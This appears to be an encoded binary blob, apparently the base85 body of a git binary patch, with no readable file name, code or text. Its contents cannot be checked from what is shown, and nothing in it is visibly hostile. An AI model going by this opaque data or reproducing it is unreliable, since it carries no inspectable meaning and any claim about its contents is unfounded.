zgIehx9t@Yqm^Exx)Pk<}M~E_MV02)k8i-gSBpU-fk0puIB;@UyO<yPUN$efrKqrM@
zf-}G&RDP;%5N2xg3p|L}^N@BWkEnP!LsqGjy3)!KG&rn}1D(@eL#W%K0iC37MB-{t
zp9$hLfTa)@rRk)M$J8-BTivIRLb^PpkrRXnWznFrP=N|(VxWR*HV&A<lOzwOA9>Iw
zsDX(Dh5|v_Tr^6=)JafZMT5%9O_GSVEy^YiBTDHYL?%e2NkmG*b3n_)Ps(sHQw-&g
zGL#L$Wt1TO4}UZnOJw9un&yx?XqC*Q8n&-VUFiWq=YS!<3`0QRJXof)yY;S}x~aJc
zN&^lj(H9kvL{QJ?Gk{>C;y<Vek5UnYDi2iUA`u7i@rmd>7?7B3Mm(hH9C9R^QW48G
zWhL$$O}HFOU+6PgzVC}@5S+mP7x^S#==(knrVkUTd|&3%DBt%@LJg6~XOdtKmI;dq
zbsF&xbMfTJAGyePzlVnoC88n`7*xmbeUh)?lfV-tW%D^iB9l+~RG?SW&@@Ai?y#dE
z3ij+~;_mutoM|G*wT9i^_r|*{YFg`aR6x5zz7Fj=^tEcY-t?dIps@{~j|OXl5Xt<L
zk7B`aJ{Zo&UK<E2v1FL?(2?W@yJ1)MT+!OEw&3N}7HFBKTlIuUNqVARw06r9x99XH
zs&g@t|NZd%8v3(ytX;7~Tzq%Y=NTH+)?l17)~FQNPG+KdYfyn*xUi+9vQ(Bf5UI8A
zV&6rGU3p8Pox#|wwkav(sUHz|HU-;rUPwjhHGb07?W*q4>=4-HJz6!Yzwr3|B>k>t
z>qmV?^ab$5#_6>JquZo<RqYgafQ}E9C>e&h9_+mtOFr&mA;^8&Rm%!H>dnzwuz*y*
zPrJ%EP`Dy`(RDfzmAp6*$rkGM&(Sn3*uIt`h$}-hDhkGP@nA9@i{+svKS{khvAk<r
z-imrs?Vsc@k=O3AT-9&W;c3j_#n16NJtmLIw&=FL_$j#}vfBA}j8tzDyUEdU7rByh
zUP!vUbwtZo-d(N03Tqdj-7*Xw2A1*FT{;+15*dQvf(01DK|-o`prx3AdlW52uO>)K
zmDH%HKoIm$7%C71DJ%+ts)$K$%(5n89N!y9Y8sQ7)|kFzH)77aw_vU3v)Np(2#6@v
z&`2&(%0e#DxNgxjNn{1)`{?K6=WpUB1Sex!({clQy!@$GQ){v<DloDwJYI%liI(PQ
zk-Tc*Eh$T-f!pDnU7@{(YY%a#zoNc^VF=fiHD^+O`neelhQ{fwVy~N1R8Z`7f0znp
z1Hm}>w%bRvlMwVDT6}x6tD#4|g`O%W6pZ!gE;k+aQR`ZAZ{ad5%2YdQUCYVMAzv{r
zb2$6GB#o7Yr1N>D>Urs*#PCA6E(0%PIXlXIhK;IGRSus{rZReHFh>{dQi`aV$I>Lx
zn8s8FMe%5^gePM%Jg6Fo39lKA<^(#L8uao%5FEup8%hU@h&2%t9S79I$x#n^EKQ|G
zyGTZpqsP+JnZN}sT)Rm4f6${@Ku4rF45DeC6XcpDOi`wo6i;Nr^b{zdiI_+gKy~jV
zrYgvPq)w$M?g^}O!UF^$ywsheg=u~zk+kbIT-}li1i^K0i3QqjUVuEW;dsp+f5_E6
zlH9$rc3cHJ>Z|HCmpQII454MoRyHPs;hd)W_?pXWNs`v@JGg7C#>PIfbUG0c5fN6R
zp<q-WU6<(p3cOhBP-4Qpm-AFlsvSj191A%;fAH4tMG2}W6Dn}i8bc~5D$qlT7J`ER
zz<-GR9JPy?ye5(trs*L>^n#ZN5slzQV~^;?^+=XC{?0wo|0sxp*h5bXKkd5m6gvc_
zX<lBJ^)aj~P;dc(3Y*YRr-da@fgrfB6xMsv3Q!=hP=Vle;0gp+w6AMFOV8yv4YLvu
z1t}`X<coWKtY{BiZ6ke?FLT+dR2&$FZTNvXu)^IcC_cY%)tf?&hC-h5R4dr8_6-iz
zzmenJvYR<No-bopehl~^I6y@KsjL@`6gwLC`o)d87>5C)!z}k1;xu!+#nvrww}?ct
z1?Co*TWD_KSrHx43$xrL>POvOjjBN{4^-e*%LA$>^;oW5)9KGyIoZwH`n}Hb&AOX<
zSvqhe9PkS&(nA~yvyDnItw4w+&WX_yB@RPwNH3@l?zFY!W|{8Koe7Ku2@WD6R<dJC
zTN66V>+(V^FI110AxgA7lxShp=BRC^D_V*oB0OG-q;H|ja`O>mHr&XOqdZJa_Hjd{
z-_rx7?;wS#)T^AMyfm?fF}GcA)4Ag?)^LVt%xzg~EqB|!@?W?*gPiPjdAtlysORO7
zq+%R81_q5BUL5V0>GUdj;f12LG=)DjogObO1O!NkwR?`KS~V&Jos49|!Ky~JCE-bq
z!c*0#5+3Bp`v!d*$n*`NTUGb<eGl<1V(g(z)Q9F?{c4qZDH`{+_E4vxhxm?g1PoAp
z6!O*JksyJEp!(=<I%A(ilD-1HzIGi}AP5>Xv~|Plq2<Xfi^TJ7tOW}^v)t$d0)cpw
z#B|0Od#CrR#d~RYy#N2c7h`+1PB%BLul7&6a0O=XGLberHq?I<`pKe<?(~~}G%$Gz
zcCUM4(bDwcD_cy%x{D&=T;KuY(NSMMR<xfSrZLuB*J)bgZOb~-wu^Pfc+>h`^y_9x
zS{CcF4SBO_R0*qTSzcPv7YKRt@&7o6es{l;zKexBO+CG|{|`wcE;&trficFODTAUM
z*rb$+fm<MA;#VLxsO}t552sj)bTTK3XLF!{9z!F9n4S)7N(W27nWSSPO$u2$mZ7-j
z+TZTx1=d)j3PZK?GX0t(%XbV-y)50V%c@aT4a#FI#jSo14Tmp})Z|x^r<KVDdpxoy
z?p55Yb@gts^{j1FSkGDtiV76{ZGIa<OKTey6c+MD>)u>jswC06(*yxv06K>pFyL`R
zR3D)|6jq?M>fWI19!s9HCGIuEeB$QL@fVPD0kL={iz~CZBo-BTP=TR0t!42t3~gS4
zD2b9dq0Jwm=x;F$ZT`R^=Ezo|{P4xH0SImfAUFVH!&+mHUrH%yJWb<iTF5+wPU|a^
z%m~`hOS|JZ{rY(ZnG^!jC3V4MSpdwh)`zTL32+EGFSwf*m!@DNc+VODoEsT8`1d+j
zNq)4n=h4tKy=wj6)s6SBtD7OT{1+N3|9*tJX>!>-SJCFk3jDiQKG_Rpy;-pzzE>8z
z>B^{8-6>Z~(R!t#^x6-xG(%`PUN$V-9y0aPlDq_p>Li@JihgcQg`(n8ELfnfzlV0}
z(EN7UR-kS4k$<2i?;~{e<4zxrtz>-<>C$?&>}L758nJ$JF&&Djsp3+szr^5B?IqJ{
z>S&lA5L1(v*vJM#pJ~;o2vGDQ%?dYP@Bjo!4y(XYIIIF&QGuT#bDZOMhz@gK-5dL<
zU)Q~h)ArVFB}lMf0jiG@BzXL7K7Ln8;#x*HO=Fs)>%^Vm+&7GK7?)+Oxh-mW!{mM7
zNBYRTwLD9+chW=sKj5w7ws=Wix9c3)b}|y%HJHo$q0rSXB2a+|o`tY_O~OS!#$TTI
z$`7*l-q&AZuz>;Yw2bv1s@^P_k<3P88sEEEFvaz8b#;@MxJTR7O<HkFFvt9At&5vu
zT;{eBZ=CmR6gx8WK5~@#BwxrOf{9eV@AE`D7%qZ7pdtzRg}(3deU*uW=!<;H=le{b
z_k5J^!-OLEh<_N1Cr5rLWBD8=p9hR76|ju!MT=&{p_`n(&&9zZ)bM?w@9a<wlUXE|
zPx+7-Oh<e|2oBtb**D#2RnZP%ENz63^bl<{4+IDtOo>jYlC7tQ2rhsfXwXuTM<$Et
zKl5245PU}S=*=gs7{q2Wxs)iMNK7}&$2!OP7YpV5n5Oi3WCk9ZgUP2#?JYee8eo__
z7*hS>85zpdLE>*F1{1_RF-n7|z@>w-=zM^zh;Vi=m5&RV`e+J3pbeRbx=x@UhZGYb
z5Y12KA*3<C)c8jYC(cMgr7i_9nMjJ%8Z;E?q3-HcLgXtE7|Ey;!l>Bfah67!CPjTV
zmXc%%p>j8Y(S`$@dP=wh2{k%3m`lcJ&WtwEnuf%EIHNeM8H`L(IF(E$^e`bxlrp0}
zF*Im8qrG8rN<vGn!~i-`0NX@_JXezO+|lPYa3C&;AT=Nf>n|PJv28l9dkpP0C51n<
z*KM5(+vTv+HI^Z7I>v6&IA7Vb+}$*_e-g%=0#fnPmnznQGq8<p(Di~b>IJ@-H^~+k
zi)0Jb7>>p+dVCv+#9H}cbf@RWSOgZr|3_+1uTveZ{Ufz+Y=$Gjxa+bU?IU_gQxlRd
zmiD?z`?uwk>PGG8s_u>2|Hs@UUY1IZUQp^jOLdcmIGxkb>7?T)>0+6&r;y=na80j<
z=pMtrMtlXn@NwCEj~`}Qh7vDhKt%-(K=DEFgJ35kX;h*Dfpir2#TL1r8Pgf3XJ5VC
z&s29nb7@~aOH}HkOmy1e)mYPz4ujyVahBK&>S*m8i*P~{BL#x1d$iVieJs6b^uo3D
z{$njejz?El%X-#&wgRn)0tE*=(DFkDJpL!UieNpvmLbREb90wezd{69%aHY~sgkU<
zwgN2$3SK<X|6_@g`tNG`_xQ=Kn&u99(|We6TRi)<UPV{^NYQByYYpr0wsBdznA16D
zT8A;Gu_o0oxgypQEiKRTEbp&n$inWHudKs5Eqw=Sx;9TiqAi&Ycgg!%fnC>O$Vv33
z_(v#7G-CQ@S<W|OTc>F)Ygx-U<E&|1mtEIorn$R+mu9(=yjY6<rhw_T^Ib5P3^S-0
z1_lSI*)3aM<h<~5UNE+QU>&zd``JC5zVZjb0VobU4g<q7-4E~qK`*pKMV~r#bBn18
zM15&3Enlf=FJ!FRU{UW+FR^L>X+W00gTMM({sw&IY&|=wKNRf}hiX_;1-w$UO$*mm
zuxd}uZn5j5^L-tx4Ge5wy{2kZ1Wwkfp7fdr`Z!6YS*o6VmO`6=8wLj3>#0Y*|99F|
zdtupuIXG`rzr|61{{BEo<US|=Qa9>9srJ-UuqOv*IiIGXL#jQ+7{;N4%4GR!jQ77I
zzbx%3!#ov@UC}aQMdP|7IWx%56k*#IT9~z><#}BziIOPZKxhIA;dWW<H@j(Wb#Jzt
z!}P19^UOSje(sL_7|v&BvfE(|!43%C^pzcJ5AjqgrLeFV2Nh_5xkpVM<$QN_>?MDm
z`!}joD)s2<`uLArl2D=AO<qh;V&uz5;=p1KQ&35nyJ4bncQyP~qY8hgV8_z*qMhAJ
zn6BqfMXA@(awT~cp_7pyP$UruPwgg4^`a5o;h3h|x;(XyJN@f6$*_;23H7Nyil*|@
z3(Hxq5{}csz1z=n)lfXNhjtozbwx|-m!9Zvbq&eTWO>xP8Kyby1G@qTIIOx$I-&w0
z*Sc|rxqUOd`5v+EG64m2o2lAM{$5v2_k`0J@20pvuE2kB1wtqclu3iedO8%(<71LO
zDOJ6s6#Z@K^8Hq02Dx#0XL*)nx8=)atu2^vYUExj5k9>@eHs4J($|_Iptu(=uI}-w
z<i)S#Me0RAqIwReYkZcd9fVLO^h}lHq522{G4(R{(!SQS)<fxFSG!xrvV1YEFV5W6
zS-Tp`477zX`5G`1-=@=v2u&T0WES?U@HF9aUz%gf*bPKxU>n)PRv>uF!Ys@XETrD@
zCfVYC`kG{mZmy9`wC+?}7M6W_aqp)W_$*fpubW4*h1I!7v*mHin`DdAL@&HawzwQ6
zMY08od(pZXt4uZ$jYOw`GPyj26wal=!=Y>_oT{OE3$bWVJxTJbmoB8DbrX`%o-spR
zeULo8t`S9j`*CJt*KJm?H@SqXH5$Ds-j2o@eP#PC?^#|jQhP&UFc{jw<u>e<w7fVi
zJoxsVm!&W@c^im(J4`gL<;eQgu4wOgYUkf#Fc{Z17@xu5w$p83ZfgS$Dwl%+IeQfp
zs1<=%K{2_UeSL_2{ap>ATQfZ%lA9Nes-l44Zqry}nATTcjUCr3Sql~<NPza#cRClw
zS-vn37OReZMOn1Jv7!vqqV=IbdMjE{pCM3zBF4e!|KFjt5cE?us&!Yg$IHhb_jPDC
z513BJVvMJgjAwn)0gNeg0AtEz8p|+^Wd=Ru_}=B=fW~t~CSEC8e<ydxs~gMtC=4Eo
zrpp9Ckn|lO_y9o#0wDNNUqK-~R|n}kKI&Wi6dDz}$#1mwXc(#*71&R{@GwbV&DKKz
z1p)#nXc=R=3<Vr5AJ#)*;3lt1EJt^_RgRJ>b_229D^E5MC1eb-M;)o@A!;54v)O!D
zrmclkl$PiBrso#RS|J>}8j|PQL+9Ev*z4b?YEP}brY6(e5`FRNH5FJjD3XWwytKxV
zqx&JWG;ptswT`>X$Bg8+>r5m&EoV{Fd0%`lM{fIKtmiHAy<u6)x~`9$+ZT&mc1f~o
zbZpDwCT^|u<sI2=tdHBKF^$wZE_0FVvJK1KCXT$j+BlB*?mli2+d5KX+tx&#GfX5o
zEqA>)jz<h*S8Ex=TJExVIebNoZy&pOIekTv)3}DoEpB2L@!do+8*zrUo5f3RJL6*~
zM{>hC+cMuqon@KC`Dz`HUDG<Q?=0VabH3Wm?&dbWiJQi4T)P+RvUu~wG7)diZ|1ad
z8}~S7j{Ani+-;X{4&%g~Iqr%XDRv?zIkvk^>mA2rcJt+!!#f)_ZtNJ=k-F>rVq8Yv
z-0e<pI(J+ov8=;x*YwDZoY-AV+!@wx$9d+O>s-vZNMcRvnuv8SVy<bI%XTMu*73|c
zhi#l`9Lss+#Eoanv5rODHF4zd<+x7r%*9Q_9KJb^8-{UR-y%15^4?3{%*Bk4yW4u>
z&NtjUo^3n38%J_(V;SzW>}tAWSL}M;q9|tVV!fdC#<KaOQ`c}B_Kg-}qM_Jr%blfk
zFcfPw6pP0)wk>zww&m`?YA6;6OX+-)18*(G&MkcMx^?;^@5S|Z@%IRKwdOj^sK5#Y
zdH?f#;qtK~b*G%xnW2EeNJ|B#nkrz73P%56p9&Nl98?U?SJ9bJD40NO6i6zU0|lJP
z<U6Pul}RESoloPbAXR5``CB7)(_`UkM|NNyyH&M!Sgu?c3~a*sy~rjEum&Mi?PRLu
z5OXkS)IJ)$86i{5VGa7TbFhmtrg&tEQpqbYMXBTt5Xkz~T2SXc)5+a&{Bs1Y{oBU3
z-eVp1m-dr>W7&kzaxFQ<IxNckW!0z}m0hqPL4tdhYsR0QTNAyQMD$|9I9N;cf_j8W
zN*byA{H5hhvW2OVBH04c!F(4F=i7J-;ZQIW&1bnT4kgmyku+Qp=QtX-xPBj6ejOV&
zoGVb59;e83VKN>|zPz-!*iCAwsbDZ44Fq2Ze0LFK?57U#Qd0IVCTdjJ`zEhiy!1}I
z{MJuX&rB^#01rV|EmQQUzOw!jv-S`Q+WSrOGq8=!P5-y*|JK;XWw`9-NYX?EfItT*
z2nxUeBmi`|D*!>jB7=el84w5r%Anxpf<Pcp00K0&gv~_504QVxU=7fs0t49OdjSOi
z;wWSUXvpH)e5_M<a5xYXP33W6kc3|YM>`6FP;m1A0)apd0xk#?0La2N`8rq%nga^9
z;fb~~76DHMN5LatgD{{V=Xy|Rh<HfId>#@c6}hnyuyL6N<t{3+4s&T7r^16k`8*^X
zRD80l^KcL{D5#0xAZQ{g5F{WYfEodSKp@bB$I%!PP38eXAb>!N3<?5pKac=S0N4P_
z#<2lapm+JUZU9CPn0y|%i2yl)f*}+nE`tNk6@lpn#}jE}P>=(XG&0yE1K^V(6o&`y
zBN4zs!}q{Z7!`O>0jj_*b6E@lCR@S)j2<9>LL}j`uo5;E73f7|mX|?622kWt0m|Km
zV&G*!6*z#CS>2aekO_;<23G(F9tjP?5x`J^6cY~yKtS#~nL)xvB7$Xafio!R=sb`J
z41v(W1_~Dj1lOsEBs6@qgof(@!2x8T@O?N~1!kU&;_$$I3<%wTX$cLVXWKp#oI$~c
zhzJ4*1Ofpd00aVA3_u`|00bB?8OM^axHc6P2)Y6U0DuVq%b=L1S+opwv6DzC%7^1A
zF-%M_5)R-0T(4&S#E0YYI*A17sJMX1M5rB&WX#}hUNpvhx;HNx8^f!hxZw|Z88V5M
zy*R8u6#PJl*~M*!cjcxRT?rC+_qr?;v^dP$q%d8r$*FoRb2{rfOxw1rahl6n=Ph$x
zmanOoB~o)}1zXYBq54uyZ5K(aX>LoB-sB{XcDuJ!plwtbm$l<MvI8Tj>)6wdg_zio
z=b~}l5SYHY=|5_#>Sr5!0n2jM;24#KTp_f~xl@@aR1MBK-=E~Cx+@l?mV44=Poia`
zO8pv!VfZg!h5?o7s6^JasUU?+DKr8D0000G0Fw{^Fenrd2t=X*kz6zxP^%sk00K@{
zDr`nFBq|z=MB;!zG#m!Q;ZO_%Q6R=pBm_bvrb*1|299`_g)A_)kXLRC<040d2fyCi
zfy6g2=FRb^#nSB9-RgVbMB7AXVR*z{Rq=elH5jWe>E4fW1_XdQ#-Tv`ZAH~yq!;xh
z-X$Jh?+GVEA{&LNr`K3S2IjS)LVXtuG#D^5r-#3fNEM3sHtuWqBIWvoj~%cc1N<S>
zrtR6@%^@{_V;-`;nu0?IXS7>6=yz#w4CUZ)kI;Dm4Qdia#sUZRdoKkFaPUYxL)3nL
z4{`cEW1^MdwPd_jBfNW!dKE|8kaMJfZJRrkbpOHS&^+h-E1v-L9Sq<{B=+k4+_&Jt
z_5*>m8XcmvxW;kb-9sHa$FFA+S!X6&sQx+vZ%~fr_N9tuFJ=SH_NEN&+<`t4FL_>R
zb@C%np2%fyK62_Y8Yn1avUxs85^UG}#8D$aL)K`q*Q``gh{IWrtezq)!mjQv3#l_l
z(ohFj(y&CFHAa8lIxN{*l0r#~V&>}&MyNnEd8y(<B-N1=K*h$p9>%AoGre)MQu!0Y
zjOtn!*3Lh?alZQo8lEL&mT+AW1Bwp2|5<y&M0>-;QzUmKMZ_!hJ-Vdf<R^9lwN%HZ
zzlB=<=8EhCCqW|vxgFd5XNu_0U8kidPVlatV6;&&aEbGO<TwODueF41!ucS$9JuU9
z35pJLf{%lIL9u?o_#6C3U&+a&jWLHu!QbFMHBVzg(7~8mKkvo1K0wC@&l>z<o}k9i
z!BOM!!A3JGAe4iwgby5WCR|q_qEM{gJJf&rPWbPciptU@K4%9i^Q{V}zX0WdP2{Mw
z5S2mu4eG8S>g1G<LmS7-16?K>b7sp<>7N>9AIec&E0OBiM4W|P5xyg`P4*rkX{jOb
z%UJA03z0V)5<M5oPpyz3=(rN?G~SVk__shVgQ#>f0_}>t6gHrZ^XhRj7QYfTX|gcp
zEOI=K{!E_uas@z*&XLWcM)A0@6z5OAv`46MI%Ng`IGu{((I1^Yj1oc^DhD7Hbd&+g
z!|EzbO?*pIG#f#VdpJyC!(|%iV9C&|3tX;QXYLcrS~P3QH0kKt$Kw~&HNFzQ+qZ;X
zzj-jmWiMQ0g7sY~5JQ;3G334i(P6!7VWr^q!hUe{zg|0ibrN=5L>ho`t#+H3BNII=
z81k+Ar+qZd&uA@jsx_@^h}OIUt44)psT^v{=D=s;OU38xmwrS=iGmn_glqIf<Ja7i
z(bmvRGBz-IjvTc;t**Vqf6Yb;y_OPSnybG@Z**__0<_sM1sP9B-f&s?X?K%T+MNTj
z%M&jU4Br_LZlrlUAX1e$=C<VEo>(7(R2kw$(QweSfba+P`m}*I5>Q|xiNK(NE`O~I
z!;c%;P0Z-%83s;b5pu&6Nr`+17#MMEabRPM9Ne&ruRUppXI(-zLrM&1qrhD6c+Kv(
z++8ulAo(}UW<o+9(|(<qG@*4G0w{Fi4g>3)J~-qCaJm&3!tGs9u!@WbqIDfj7#ofl
z>kQ6Jx6)N$;uds4Mn1IJk2U0kj|fjO*s&cYAp^_GtyLL%wFBN-cA2tJt96f7%#-vm
zMg|7<uI_i5_t6X<e5#-#+WYu~QsBzd#L(R1zEK{jSFl$o8N6_S+4}RoNS{(-`X$M`
z^h^BGLOfC%;{W#4FJ3Ob+Kb1%6t$q++ZdAUX}MCiT_pF`iSkmCJoYHk8J|C^0g04U
z7?M%*eJ83-S$x%2PW2$X7OwBf2A$y6Dw{s>>`=zBln}wz3m^oh)Z5DyLZvC{S0cZ?
znm@tmAB(oGWERsW3Ts0PAx?F*5&mbPQs*^`Vx=~Cvz>lqa-ZE37tei|DRC-!$lgV$
zb(u8ZgSFduT*NdM?J<>oI5i<cvKrPFCoicbU`?zdj2XRM^-e*cFcrr2279V8E>D59
zEby<aAT1$QUN{NN45fZxZ+?m5za#hOahvz6EWViZD_GN?v;mZ&ZY{%#7^IJF-cL3!
zf-ezKK_G02Bm?N9%t>Fy0EOk6S}Q}8>S9$X2r2!($sCE<57GEi;Wh7apnP?A?7_j+
zDVKinK4ah<Fa1|&f!Nn<3!o;zu>zh!44`pT(Z9--M=?NL!HbPr+@mfC)aMbqUVF7`
zMowFLa2W{MdHCE4w|k4321<JYeX;=qM%EKo7{wFEnP3PUAw`C(i|7;)#;rk}=*aSs
z(VFFK9OI$7F={yORJpusQZ+Q9&iUf@@BL=xsNal>HA6SI8|G)l{{(0!hA1YeXFAb5
z8J?;Qsq~O&tz81r{YyRT1eqtSc8Sy^9zGIoA8DyONHL*MUaEmCTm}y5M><pAtC6h(
zj6Jqyp8ZxHMq}+h_9u6d3_e-Pa0`5zKWy<L3<AlMUF(0lEFCc-Bp5}i(6jd07lbgu
z<picEOV$8jdOu4@i56iWOB1v#PKbu$SN!kk{C_R2-$d}$umrANl^~mp<6(qjF$u}Y
zc5O_`Cf4zP$NjSZLCw4Ij~eF(P)5W22_%pGsE;(v$N%2*XX*B+&T|g@<+^eQoZYP^
zojb(?tpH(($=3brku#vIPqnPHKyE-vxOq>@wZQe1Hc^5CWIkKM;fiVd;8DEqyP_O3
zS}lhiJ1e*fhB+cNJ(UF5M27SbxWtiRo@Daj+66T*@{=R@`ASsk0}IU9-;=6_+7)*L
z9oiN;40za#mlYkUiik8)rpJL4%<6MzrOzAwVcF21NV5UC2ndC##QIg)9m->}U}JV=
z4TVjgPe2nldJ|=2fOYR>Lhi=iljI$Ag6zOMR)>l$`=wEf+M{OR<6>6d$+T?QB~n69
zECoocazZhJUZNhxbcnhgEeO}en;07X*SYk*`$i4#<m~Og;-T8=a2L_pcd9}dkL`Ue
zqH{RtIwsnF50lY_@E?+uE3{BRK@meQ5R#qE2dQleGT=|5sX$Vp3k#q$T1Nr7x9xOw
zu%rck(oo4JrLl;Qxh;E2W0JMh7t2txBF{ucALO|a;n}o~<C0D-^tGw?2a&%8=Xdj%
zMT8SDqqMsMH@RI16=)i3sbi|jS6n^k7u|u6rv`;&{uB-%Vy{Vxonkm33LMOJ0*-OL
zH1;HuqTlW@;~lQ-O$lq^WW4?igc5f;s7NnKefYCskx+B-<3jCm2#PF2!Zb2lzsN>|
z!u1Xm1&A+Fg%}MS-euC)6)d+b6dIVkwtzErTak*-6@@>>8$*%MPq{Id4<NR?6>LxM
zw#s>nm?((>z6|9zREH}%r9ZEm$Bk;#=)b1DP9d)6&zoSbqw0!Bd22yycJBV+!v$s}
z9nX8$eG6IHr4O8GM{r&}p^Zeo+hCJtFD(5+$W|<|wngZP(ZIOikdy*$i?t)bFc})2
zC{Hj?8QLs<Wes6a2<&&REL8$ewQlj9x-vviNsII+kw;+YEKrGFw{OGpW;Wj^NeiVJ
z4`P7uis|>YnX25J3o1XXCaGjn=(Ke>b+p*ZDI#j0^uom-q0M$(?c2H6KKQsw=5FF^
zbApms#8b5LFg`|nfgpWij4I%x@~7M9J-k5to$M$HzW!1&%;?0hXq;Y;?*^%;-oD*b
z>Fe1jg*MIt_b~`4Z>`c<S%(HJh{ELc5crLr_yewEmi(rtn2kJAg`O5|_54S`t@c4X
zJ{8+o#6`n40!jRNugM~yggIGv7C8;)rb4lXn#(_&rk1QffTd;fMs4!1N(C@lS%CgD
zFuJ3p$se*No!j@U^}j<sT2Ls>@3&2Xu@O%sp%2j2#N9I#4f4Lr-}iUC?rlz)c%o6o
z))~o4yM?g3!UXb(o)XW@-xs3NLnCPVvZ6*MbBcoF>w_rX)zZ~>h{GS|Bs86?K)%Ue
zmXhg{7;YwEGO(#Z(KKz@prM&-VS&7Z=KNNJ97wx#m9cHhQHmsF#-j|sm&7H0%veFm
zjCH<v%vih>e$*%`&?1?delp`k93wlrq!KlUvs6XQmTN^Y-<IZ%InMpD{v7Bc?ejh+
z9}ZbQ3;Ysv8V{tbq|N7_&nVF7fW7QW)NaYdks2QN5!_XFzJ)uaUPr`Fhx$PDB0M0&
zdC7pj-sB$n@bYoRg2V0Q1Tv<AKoEX6icMuPn*L6y^|M)Ogi>;>GXY;zwBG+wvCeRY
z<q+1R!(>BX*}90XPWH4NUgx*Mda-p5AOryLcq6du2O6u`erl#=AuntfCYjO<aOu-t
zd1h>{gd7btXsm_?J0`z4T7bivTeRv2#L7Wkkvsx1w5xz>R)Zn{s-mW^)c(;avf@8)
zX|nAm8NiDbWm}UuA{&3KvUYmo`E?zcHIkb_14!JNi-~-?)nui0c{pS`kd1}OmtSdn
zR%YWT=lt9ZR&k+7y5moa&tzJqJ2nkK@u)n0k$@xaDqRh)L^qA9r_t+KhMTO5qo5qU
zvP!^qMQ0HV<3vL}xFgb|CyZ@_g&UeGt#{236uZZ)-OYR0CzNO^(`j06ojt}WbHlF2
zD$!I8DW+#HNy)vQ`K2nP<vvS0o)STr$lR>WmB}vNCNwf#Q2~jC{KiQU{U(Jh4q>P_
zAdw?|{!(>q<--(rQQ1=eQT<yN7J%!*V1azz?FvR0dIN246N|L2;WwM4b)r%y^$!>x
zXV^I~*~9R{egl`4lsJg3*@ROYK2};fkD%HFnZoI+TbvHka0ZP;Q^T5jZz#=^TOAcZ
z2)p%Jk#UHoF!BWP)-@+T%=L?AOe&mTNuc&kUvL*@6%D>NQMzhXpp<=T&VCU_M?vvj
z)LcCUNR#wpLaZ`7ihc8ayfR%&8?d)onj^tt>XKSrC@e27>juZoNt1uuaOxh|I~8^s
zLiy&^*h58B(Uji*oQ9hGa5l&IeEu1;+x_sPIYu@3Q^vpyW2AXY|Ck+}0K>R>{EA-x
z;Hh)L3!JkF`_BXM-VEe7$3nEr!ZXf`oX&5+-I?O(PhnuQf7%UiBRu{*<2wKR450O|
zXd+lS&Hn!Jyjk%hVDezD2ao?3WJ9avyt@TF5CJ6sMIAi~^HI3-0OBntpfuTN)-wl>
zwP2AqvDsUo4y2gF2B>)*#GfY6Y=a$!;q@0rAQ-x54lxUAKWYLO@QZzTM5G7$0A%y^
zQ+iOaPKb}8xw<WLyGj&A<~aB#!zC&Cj2LhYXpQEvIw)F5-*m4rz18e+?T;?#X<Xe>
z?Fyjb*k8Cn4l10gYymHhhxx|!+%Q?MJ|cy1Jq;(KkQ|8L%k}b>Gx6wKr~)ckH03V}
zT-l-^#Xc3Au#3QmIV<b{VmBq(xey>F%5cT3Q(jA8l%vlS-7-X;@)J0I!&#2C?KdE`
zauWifITzI@^_hY!{anP3Zl1iQQ--FZBLGYqQFO~(E&Z2ziGp#puww*4Vw|LXHC?|=
z+;{QF9B-@%S_rij1pMR#SL_j|vXtn^elwdzx#Y>cHh4--J}*Qe>e|XfYVX>e=W!j#
zy(v4;^N3-r2v@dw`PB1xLTLC*+D)zMJPk@W%mct*HNb*sHaD@kJtch}3OgA<I@^ut
zZn8qb#$o;4Uj0}7>tr#`xPMy>z=p0wLvJ~=S5u_m4p0V;6|3p>5L`T>xN^L@#E6>K
z<ytA*hTlfPTEsn#F^&i>M*060&8arzZU8N|NX0<27zGHVvlFS4b;`%t=<c5xU!1@P
zRb_x8)Ev<Zg+pk|6mlXAqF%kcd(BG9=|h~a{<7^ukv6yPsFjYnpnYOueGsw0vQSGr
zw;16$6#gvVH-e;W#TfTkR^<O#3Wd997l!E4NWe|$+Z8p7Y?pv`jBGf01kr-@7pn(m
zCBa7*h;jbTyuTBj?{q`z0G+`P1kvI9x*LJq>tleG_AbEpBQa&bA6<E^!CbE6>x9tI
zC~Iu@b_7DwBr?SpAuA9fS1F;yo1$p3tM&bDg@ei3S9D{9(2g5!x{2TErG-OAKn37J
zL><ij=$DUX4))v}Kfkqu=~>uFoq~-#7>e)#2w@aXxj@4~J?MlgOMD{*EN(y%_U^1K
zt^a^D7h`Q(_|*cbzQH|M>&Im)zQl1e=y{b*>b`LwydJU8(vCtp0#*RA9>nSyU=5b;
zK6XBxFzNJO7GGc^DLt%Z2Z$zZ*5Tt!w1h@*+=SA7^wgPLq7wQFf3Bh#HsgcQHNA)v
zwbE>q5pP<kYQ(QF9OSTTF~Xg^tf^CIlC8f;bFS%I0NqZu6{0|Su3a>_TB+MM)}w#C
zezR5SdQ(t>%6jFpVqAPPIYP-5@U@V6B#=6r*kl8w^#U$vH+{<rB+c=@8^M&=G_`&H
z;@CXL;z#$Ww@LUSH5ObEqB?@}NCp9?nynqNAB%Yur7ABkf@OAvRt`2WNvJSe8fU;h
z8;2csXKPE|1}BHlX&UbOYhA1cQPzV&ht2M|RdNMIM0lvfHZStR{WHKqV7oyJM?aXa
zPtC9-jrF)P*lk6E=^U70kAdzNkvl=X$%gga9hNYTH0d-sAkmG7gB5*7J<e!BgNm@x
z*Qg5TQyv_(dsas&P>l|$P7;7-yJ-T9oRs+A0w|84NZ6kc+|P2?7}Msbl__`=G9^w4
zLlF|D`lu3xL`uRpvrroFItEOQtv?6w;`pZvTeoZcvQjVaN?UhrH-`_5<GG2c6l?}C
zisPxIM}E749FfVGgUNNM5~OZsm{csq<ro)=h+`#zeW;9hr$Mrtw!IXsTDUrL!_4Y%
zQmaZ&Ex`62;kg9f)abFP0o<cX&zJ)0WV=T$8)<X{c+Rk1IOQRzu<eWgKKY_^0cY=K
z5Rhs#)TuAcvXU28sV?gDgs8N*>6c$N6mr$hl|+y!0x~vqM)`e(a?8lot4&aW4V>%L
zSIae=GRK8M5mchlETDD8;L^pS#VUZK)kz6$o|jzF+96>ov@7JBLmNX)9-9EsU>}Ir
zC@n*FbE)KF*ZHHm{bftYn?USpfOse+duswnwm32s@$=o!Mz=$`@*Zrw>b5HFgVM=|
z-MNJ%Bb6ZjIO_4QTP6s+3rfGyNn=oE7UAb%tq&k4$UL%X=^P*;O_l~<gEDMn2q)*R
